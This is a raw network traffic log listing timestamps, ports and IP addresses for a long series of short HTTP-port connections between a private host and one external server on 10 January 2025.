Jan 10, 2025 09:27:51.306586981 CET	50083	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:51.306592941 CET	50082	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:51.311444044 CET	80	50082	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:51.311451912 CET	80	50083	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:51.311630964 CET	50083	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:51.311728954 CET	50083	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:51.316555023 CET	80	50083	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:52.312535048 CET	80	50083	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:52.312588930 CET	80	50083	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:52.312602043 CET	50083	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:52.312633038 CET	50083	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:52.312659979 CET	80	50083	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:52.312712908 CET	50083	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:52.312868118 CET	50083	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:52.317677021 CET	80	50083	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:52.431216955 CET	50084	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:52.591917038 CET	80	50084	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:52.592047930 CET	50084	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:52.592216015 CET	50084	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:52.597011089 CET	80	50084	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:54.126885891 CET	80	50084	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:54.126899004 CET	80	50084	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:54.126961946 CET	50084	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:54.126961946 CET	50084	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:54.127089024 CET	50084	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:54.131841898 CET	80	50084	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:54.244395971 CET	50085	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:54.249186993 CET	80	50085	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:54.249299049 CET	50085	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:54.249459982 CET	50085	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:54.254215002 CET	80	50085	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:55.112368107 CET	80	50085	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:55.112440109 CET	50085	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:55.112545013 CET	50085	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:55.117306948 CET	80	50085	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:55.228255033 CET	50086	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:55.233068943 CET	80	50086	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:55.233155966 CET	50086	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:55.233478069 CET	50086	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:55.238230944 CET	80	50086	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:56.215364933 CET	80	50086	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:56.215425968 CET	50086	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:56.215848923 CET	80	50086	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:56.215859890 CET	80	50086	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:56.215887070 CET	50086	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:56.215909958 CET	50086	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:56.215984106 CET	50086	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:56.220763922 CET	80	50086	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:56.322074890 CET	50087	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:56.327037096 CET	80	50087	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:56.327110052 CET	50087	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:56.327219963 CET	50087	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:56.332437038 CET	80	50087	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:58.822376966 CET	80	50087	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:58.822582006 CET	80	50087	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:58.822698116 CET	50087	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:58.825134039 CET	50087	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:58.830354929 CET	80	50087	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:58.933367014 CET	50088	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:58.938316107 CET	80	50088	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:58.938739061 CET	50088	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:58.939017057 CET	50088	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:58.943829060 CET	80	50088	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:59.794313908 CET	80	50088	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:59.794420004 CET	50088	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:59.794467926 CET	50088	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:59.799261093 CET	80	50088	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:59.968569040 CET	50089	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:59.973412991 CET	80	50089	8.148.6.140	192.168.2.6
Jan 10, 2025 09:27:59.973484039 CET	50089	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:59.977205992 CET	50089	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:27:59.982012987 CET	80	50089	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:00.854729891 CET	80	50089	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:00.854856014 CET	50089	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:00.854971886 CET	50089	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:00.859819889 CET	80	50089	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:00.962354898 CET	50090	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:00.967221022 CET	80	50090	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:00.967505932 CET	50090	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:00.967505932 CET	50090	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:00.972579002 CET	80	50090	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:04.911849976 CET	80	50090	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:04.911871910 CET	80	50090	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:04.911884069 CET	80	50090	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:04.911998034 CET	50090	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:04.912276983 CET	50090	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:04.917114973 CET	80	50090	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:05.031053066 CET	50091	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:05.035912037 CET	80	50091	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:05.039238930 CET	50091	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:05.039238930 CET	50091	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:05.044023037 CET	80	50091	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:05.993217945 CET	80	50091	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:05.993228912 CET	80	50091	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:05.993292093 CET	80	50091	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:05.993295908 CET	50091	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:05.993357897 CET	50091	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:05.993869066 CET	50091	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:05.998651028 CET	80	50091	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:06.105149984 CET	50092	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:06.110162020 CET	80	50092	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:06.110250950 CET	50092	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:06.110570908 CET	50092	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:06.115361929 CET	80	50092	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:07.663578987 CET	80	50092	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:07.663634062 CET	80	50092	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:07.663642883 CET	50092	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:07.663680077 CET	50092	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:07.663728952 CET	80	50092	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:07.663774967 CET	50092	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:07.663959026 CET	50092	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:07.668785095 CET	80	50092	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:07.775410891 CET	50093	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:07.780390024 CET	80	50093	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:07.780464888 CET	50093	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:07.780637980 CET	50093	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:07.785476923 CET	80	50093	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:08.681519985 CET	80	50093	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:08.682246923 CET	50093	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:08.682348967 CET	50093	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:08.687129021 CET	80	50093	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:08.793508053 CET	50094	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:08.798362970 CET	80	50094	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:08.798546076 CET	50094	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:08.798888922 CET	50094	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:08.803639889 CET	80	50094	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:12.802654982 CET	50094	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:12.984889984 CET	50095	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:12.989780903 CET	80	50095	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:12.991069078 CET	50095	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:12.994018078 CET	50095	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:12.998862982 CET	80	50095	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:13.890955925 CET	80	50095	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:13.891017914 CET	50095	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:13.891108990 CET	50095	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:13.895865917 CET	80	50095	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:14.009885073 CET	50096	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:14.015010118 CET	80	50096	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:14.015145063 CET	50096	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:14.015264034 CET	50096	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:14.020090103 CET	80	50096	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:14.994836092 CET	80	50096	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:14.994918108 CET	50096	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:14.994978905 CET	80	50096	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:14.995215893 CET	50096	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:15.103070974 CET	50096	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:15.103072882 CET	50097	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:15.107968092 CET	80	50096	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:15.107988119 CET	80	50097	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:15.108099937 CET	50097	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:15.108460903 CET	50097	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:15.113284111 CET	80	50097	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:19.111131907 CET	80	50097	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:19.111150980 CET	80	50097	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:19.111335039 CET	50097	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:19.112241030 CET	50097	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:19.117033958 CET	80	50097	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:19.230103970 CET	50098	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:19.234942913 CET	80	50098	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:19.239279985 CET	50098	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:19.239536047 CET	50098	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:19.244539022 CET	80	50098	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:20.096354961 CET	80	50098	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:20.096431971 CET	50098	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:20.096486092 CET	50098	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:20.103038073 CET	80	50098	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:20.213263988 CET	50099	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:20.218204975 CET	80	50099	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:20.218280077 CET	50099	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:20.218405962 CET	50099	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:20.223129988 CET	80	50099	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:21.079124928 CET	80	50099	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:21.079649925 CET	50099	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:21.079649925 CET	50099	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:21.084655046 CET	80	50099	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:21.199014902 CET	50100	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:21.204018116 CET	80	50100	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:21.204129934 CET	50100	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:21.204240084 CET	50100	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:21.208987951 CET	80	50100	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:22.168569088 CET	80	50100	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:22.168622017 CET	80	50100	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:22.168629885 CET	50100	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:22.168668032 CET	50100	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:22.168773890 CET	50100	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:22.173526049 CET	80	50100	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:22.276107073 CET	50101	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:22.280972004 CET	80	50101	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:22.281037092 CET	50101	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:22.281198978 CET	50101	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:22.285979986 CET	80	50101	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:23.276449919 CET	80	50101	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:23.276518106 CET	80	50101	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:23.276552916 CET	80	50101	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:23.276628017 CET	50101	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:23.276628017 CET	50101	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:23.278995991 CET	50101	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:23.283807993 CET	80	50101	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:23.386992931 CET	50102	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:23.391819000 CET	80	50102	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:23.391905069 CET	50102	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:23.392055035 CET	50102	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:23.396783113 CET	80	50102	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:24.249017954 CET	80	50102	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:24.249068975 CET	50102	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:24.249391079 CET	50102	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:24.261780024 CET	80	50102	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:24.360678911 CET	50103	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:24.365483999 CET	80	50103	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:24.365550995 CET	50103	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:24.365695953 CET	50103	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:24.370475054 CET	80	50103	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:25.256654978 CET	80	50103	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:25.256736994 CET	50103	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:25.256875992 CET	50103	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:25.261624098 CET	80	50103	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:25.368870020 CET	50104	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:25.373686075 CET	80	50104	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:25.373779058 CET	50104	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:25.373895884 CET	50104	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:25.378633022 CET	80	50104	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:26.302459002 CET	80	50104	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:26.302582026 CET	50104	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:26.302664995 CET	50104	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:26.307625055 CET	80	50104	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:26.416779995 CET	50106	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:26.421622038 CET	80	50106	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:26.421839952 CET	50106	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:26.421905041 CET	50106	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:26.426776886 CET	80	50106	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:27.488518000 CET	80	50106	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:27.488549948 CET	80	50106	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:27.488588095 CET	50106	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:27.488610983 CET	80	50106	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:27.488620996 CET	50106	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:27.488660097 CET	50106	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:27.488754988 CET	50106	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:27.493618965 CET	80	50106	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:27.605540037 CET	50107	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:27.610471010 CET	80	50107	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:27.610554934 CET	50107	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:27.611368895 CET	50107	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:27.616218090 CET	80	50107	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:28.444595098 CET	80	50107	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:28.444674015 CET	50107	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:28.444808006 CET	50107	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:28.449609995 CET	80	50107	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:28.558011055 CET	50108	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:28.563007116 CET	80	50108	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:28.567125082 CET	50108	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:28.570034027 CET	50108	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:28.574943066 CET	80	50108	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:32.563205957 CET	80	50108	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:32.563323975 CET	80	50108	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:32.563407898 CET	80	50108	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:32.563627958 CET	50108	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:32.565016985 CET	50108	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:32.569832087 CET	80	50108	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:32.683012009 CET	50109	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:32.687834978 CET	80	50109	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:32.687927961 CET	50109	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:32.688064098 CET	50109	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:32.692811966 CET	80	50109	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:33.546777010 CET	80	50109	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:33.546850920 CET	50109	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:33.546945095 CET	50109	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:33.551703930 CET	80	50109	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:33.666173935 CET	50110	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:33.671120882 CET	80	50110	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:33.671215057 CET	50110	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:33.671336889 CET	50110	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:33.676163912 CET	80	50110	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:34.528832912 CET	80	50110	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:34.535231113 CET	50110	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:34.597635984 CET	50110	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:34.602739096 CET	80	50110	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:34.792635918 CET	50111	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:34.797549963 CET	80	50111	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:34.797652960 CET	50111	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:34.797946930 CET	50111	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:34.802762032 CET	80	50111	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:35.782660961 CET	80	50111	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:35.782692909 CET	80	50111	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:35.782732010 CET	50111	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:35.782819033 CET	50111	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:35.782890081 CET	50111	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:35.787626982 CET	80	50111	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:35.900978088 CET	50112	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:35.905875921 CET	80	50112	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:35.905973911 CET	50112	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:35.906119108 CET	50112	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:35.910932064 CET	80	50112	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:39.896015882 CET	80	50112	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:39.896087885 CET	50112	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:39.896183968 CET	80	50112	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:39.896239042 CET	50112	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:39.896295071 CET	50112	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:39.901014090 CET	80	50112	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:40.011436939 CET	50113	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:40.016299963 CET	80	50113	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:40.016381979 CET	50113	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:40.016556978 CET	50113	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:40.021348953 CET	80	50113	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:40.965547085 CET	80	50113	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:40.965630054 CET	80	50113	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:40.965667009 CET	50113	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:40.965734959 CET	50113	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:40.965835094 CET	50113	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:40.970596075 CET	80	50113	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:41.077495098 CET	50114	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:41.082408905 CET	80	50114	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:41.082509995 CET	50114	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:41.082988977 CET	50114	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:41.087749958 CET	80	50114	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:42.057889938 CET	80	50114	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:42.057915926 CET	80	50114	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:42.058056116 CET	80	50114	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:42.058067083 CET	50114	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:42.058067083 CET	50114	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:42.058129072 CET	50114	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:42.065376997 CET	50114	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:42.070209026 CET	80	50114	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:42.181966066 CET	50115	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:42.186798096 CET	80	50115	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:42.186868906 CET	50115	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:42.187005997 CET	50115	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:42.191761017 CET	80	50115	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:43.160495996 CET	80	50115	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:43.160594940 CET	80	50115	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:43.160609961 CET	80	50115	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:43.160698891 CET	50115	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:43.160700083 CET	50115	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:43.161205053 CET	50115	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:43.165990114 CET	80	50115	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:43.277827978 CET	50116	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:43.283459902 CET	80	50116	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:43.283608913 CET	50116	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:43.283855915 CET	50116	80	192.168.2.6	8.148.6.140
Jan 10, 2025 09:28:43.289613008 CET	80	50116	8.148.6.140	192.168.2.6
Jan 10, 2025 09:28:44.248059034 CET	80	50116	8.148.6.140	192.168.2.6
